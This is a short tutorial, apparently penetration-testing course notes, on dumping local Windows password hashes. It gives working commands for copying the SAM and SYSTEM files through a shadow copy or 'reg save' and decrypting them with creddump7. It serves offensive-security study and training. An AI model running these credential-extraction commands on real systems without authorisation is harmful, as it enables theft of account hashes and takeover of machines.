## Intro
Windows can authenticate local user accounts as well as those belonging to a domain, which are stored within Active Directory.

Local Windows credentials are stored in the [_Security Account Manager_ (SAM)](https://en.wikipedia.org/wiki/Security_Account_Manager) database as password hashes using the [NTLM](https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4) hashing format, which is based on the [_MD4_](https://en.wikipedia.org/wiki/MD4) algorithm.

To get the SID of the local administrator we can follow this process:
1. Use powershell to use environment variable($env) to get the local computername.
2. Use it with the [Win32_UserAccount](https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-useraccount) class.
3. Pair it with _ComputerName_ and _Domain_ methods.

```Powershell
$env:computername
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"
```
This will reveal the SID of the local administrator.

## Grabbing The SAM File
The SAM is located at C:\Windows\System32\config\SAM, but the SYSTEM process has an exclusive lock on it, preventing us from reading or copying it even from an administrative command prompt
However, There are a couple of workarounds.

**Volume Shadow Copy Server**
The Volume shadow copy server can create a snapshot or "shadow volume" of the local hard drive with [vssadmin]. 

**WMIC**
We execute this option through WMIC launched from an administrative command prompt.

We’ll launch wmic, specify the shadowcopy class, create a new shadow volume and specify the source drive with "Volume='C:\'". This will create a snapshot of the C drive.
```Powershell
wmic shadowcopy call create Volume='C:\'
```

We verify that a shadow volume is created with:
```cmd
vssadmin list shadows
```

We can finally copy the SAM database from it using the source path:
```cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\sam
```

We will reuse the same process to copy the SYSTEM file as well for decryption:
```cmd
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
```

**HKLM**
Other than this, We can also obtain a copy of the SAM database and SYSTEM files from the registry in the HKLM\sam and HKLM\system hives, respectively. Administrative permissions are required to read and copy.

We use _reg save_ command to save the contents to hard disk:
```cmd
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system
```

## Decryption
Now that we've extracted the SAM and SYSTEM files, we must decrypt them.
This can be done using _mimikatz_ or [_Creddump7_](https://github.com/CiscoCXSecurity/creddump7)
We use CredDump7 with the following command to dump the Administrator/user hashes:
```sh
python pwdump.py /home/kali/system /home/kali/sam
```

